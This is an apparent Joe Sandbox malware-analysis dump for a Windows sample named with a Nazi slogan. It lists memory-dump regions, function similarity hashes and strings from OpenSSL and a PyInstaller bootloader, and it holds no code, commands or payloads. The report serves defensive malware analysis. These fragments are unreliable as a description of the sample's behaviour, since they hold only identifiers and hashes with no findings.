• Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID: 00007
• String ID: &$..\s\ssl\statem\statem_clnt.c$resumption
• API String ID: 3568877910-1441847574
                                                                                                                                                                                                                                            • Opcode ID: 73da6ed3a122ca658e289fa11470f3a3e71e111d3fe2952cdc4eaf4fdab7512b
                                                                                                                                                                                                                                            • Instruction ID: 5d8f4ce6517c7bcc80e417b94e66c092aa54b875c4a0fb6030d9d7fbd085c592
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73da6ed3a122ca658e289fa11470f3a3e71e111d3fe2952cdc4eaf4fdab7512b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F10372B0868185E7289B15E4A4BBDB7A0FB84B84F058175DAEE577D8DF3EE580C700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007
                                                                                                                                                                                                                                            • String ID: $..\s\ssl\ssl_sess.c$T
                                                                                                                                                                                                                                            • API String ID: 3568877910-2024727245
                                                                                                                                                                                                                                            • Opcode ID: 4200142c00a380515af32dd588f4d13a0373dba83e7865d16fcefcd847d84a21
                                                                                                                                                                                                                                            • Instruction ID: 9b2ae92ab8785859dbecf54792fa97cf35b89b6e7b3ef58ea6e3584216edec79
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4200142c00a380515af32dd588f4d13a0373dba83e7865d16fcefcd847d84a21
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42C1753270868182E759AF25D4A8BF92791FB84B88F044076DE6E4B7D9CF3EE955C700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: verbose
                                                                                                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                            • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                            • Instruction ID: 5bfbfe9ee72169a339b73ff0211cb6058e7213603982fe5c203b5fe916921353
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8291F232A08A4685F7658EA4D45637D37A1AB40B94F844336DE9DE33D6FF3CE849A300
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                            • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                            • Instruction ID: 6d0f7454b8fec6c00dd6cf00228ac33d822e6e7074f624caf0611361992f1dec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0881CD72E0821385F7749EA9815227826A8EB11B48F558735DA2DFF389CF2DE941B702
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007B6570
                                                                                                                                                                                                                                            • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                            • API String ID: 4069847057-87138338
                                                                                                                                                                                                                                            • Opcode ID: dd12be397e2784a3b9b42d5ec1b23b2ed281038ba6f510f7d5b8d27382faff68
                                                                                                                                                                                                                                            • Instruction ID: e4626b57dd142e38aad635d4ba85b6c1ff1874e06f156893e42656bad2aef596
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd12be397e2784a3b9b42d5ec1b23b2ed281038ba6f510f7d5b8d27382faff68
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E661E672F1864246E7688E19AC20A7A6292FB90790F548275EE7A47BCDFF3CD405CB40
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
• Instruction ID: 61be1db25d527b0826e63ee315ab3468e3c2d08d298a55817cdb556ed082ef50
• Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
• Instruction Fuzzy Hash: 5F51BF32B196428ADB14CF95F445A787391FB44B98F918230DA6EA779CEF7CE841D700

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
• Instruction ID: 3fcdcd1c0f0ea58bf7fcc9dfd958138af5f85b08eccddb40698e0f4ea41e857b
• Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
• Instruction Fuzzy Hash: B651A332A08B428AEB748FA1D14526837A8FB54B84F945336DA6DABB95CF3CF450D701

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
• Instruction ID: 8358b9b083ad9bcf205d14673147ecac64c4f19881dc2d13d781748a40487605
• Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
• Instruction Fuzzy Hash: 0061A232908BC586DB208F65E4413AAB7A4FB947C4F444325EBAC57B99DF7CE194CB00

Strings
Memory Dump Source
• Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
• Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
Similarity
• API ID:
• String ID: ..\s\crypto\async\async.c$T
• API String ID: 0-2182492907
• Opcode ID: 84e0df82d853d50b4fd7d046fc8fec4d13de8957f562a682e85f1a9d1bb3de25
• Instruction ID: 6d9ff846f709a70c4ba6efee97e1ccec4dfdf331e73987838bb539aa2643e968
• Opcode Fuzzy Hash: 84e0df82d853d50b4fd7d046fc8fec4d13de8957f562a682e85f1a9d1bb3de25
• Instruction Fuzzy Hash: 40519C31B0A64382F725DB11D4209A96761EF49BC8F444535EAAD4BBEEDF3DE608D700

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
• Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmp
• Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
Similarity
• API ID: getnameinfohtons
• String ID: $..\s\crypto\bio\b_addr.c
• API String ID: 1503050688-1606403076
• Opcode ID: b69e7613c5b0375f733938ffa7987aef18c604bb2f14d9f82ce55754868d6c3f
• Instruction ID: 1107d9d858874b926384c3682e7c38e57cef13016523e848d136273e00d04284
• Opcode Fuzzy Hash: b69e7613c5b0375f733938ffa7987aef18c604bb2f14d9f82ce55754868d6c3f
• Instruction Fuzzy Hash: 2451D222B1AB8385FB249B11D820AB973A1EF51788F444135FBAE476EDDF3DE9419700
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\bio\b_sock.c$J$host=
                                                                                                                                                                                                                                            • API String ID: 0-1729655730
                                                                                                                                                                                                                                            • Opcode ID: 31c7aae0c6204fcaae541c015ea13e20bcfa82d779c5bb0f8b846d03ff15bf19
                                                                                                                                                                                                                                            • Instruction ID: a098da8ff921f157aea59a0ed32bb914f32103b35cf6b101f7cc1169ccc73b3e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31c7aae0c6204fcaae541c015ea13e20bcfa82d779c5bb0f8b846d03ff15bf19
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2316F36B0858382EB14DB59E461969A360FF85794F440135FEAC47BEEDF3DD6408B00
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,?,00007FF633D6352C,?,00000000,00007FF633D63F1B), ref: 00007FF633D67F32
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                                            • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                            • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                            • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                            • Instruction ID: 1bc1189d81329e79b0f594df65f4b7a7ddf4bfb33ccbd971c0db40d7ffe78eff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B031E621619AC645FA219B61E8127AA7358EF84BE4F800331FE7D977C9EF3CD6059700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                            • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                            • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                            • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                            • Instruction ID: cb4500abcac2290a2ecdb12b620301205265b60e94a368f1fe62eb829fa546cd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC21F772708B4191E7109B94F8467EA7360FB88784F805236EE8DA7756DF3CD255D740
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFC9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFDD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1B9000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB1EA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB25E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB264000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB266000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB282000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFB28F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035725372.00007FFDFB293000.00000080.00000001.01000000.0000000F.sdmpDownload File
